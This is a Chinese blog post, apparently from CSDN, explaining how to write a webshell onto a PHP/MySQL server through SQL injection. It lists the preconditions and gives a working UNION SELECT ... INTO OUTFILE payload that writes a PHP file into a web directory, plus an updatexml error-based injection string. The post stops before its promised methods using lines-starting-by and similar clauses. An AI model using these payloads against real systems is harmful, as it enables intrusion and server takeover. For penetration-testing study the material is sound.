报错注入写shell

本文详细介绍了在PHP环境下,通过数据库(如MySQL)的报错注入来写入shell的条件和方法,包括secure_file_priv的检查、联合注入的使用限制,以及报错注入的语法错误示例。通过lines starting by、fields terminated by和COLUMNS terminated by等语句进行webshell写入的实践,探讨了可能导致写入失败的原因。
摘要由CSDN通过智能技术生成

写shell条件

1、secure_file_priv为空

查询语法:SHOW VARIABLES LIKE “secure_file_priv”;

2、知道绝对目录

3、目录有写入权限

最常见的注入写shell方式

union select 后跟 into outfile 语句,这种方式仅支持存在联合注入的前提下面

注入语法:

?id=1 UNION SELECT '<?php phpinfo();?>',2,3 into OUTFILE 'F:/phpstudy_pro/WWW/test.php'

sql语法:

SELECT * from admin WHERE id = 1 UNION SELECT '<?php phpinfo();?>',2,3 into OUTFILE 'F:/phpstudy_pro/WWW/test.php'

在这里插入图片描述

报错注入写shell

报错的基本语法:updatexml(1,concat(0x7e,(select version()),0x7e),1)

这样可以查询到数据库版本

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值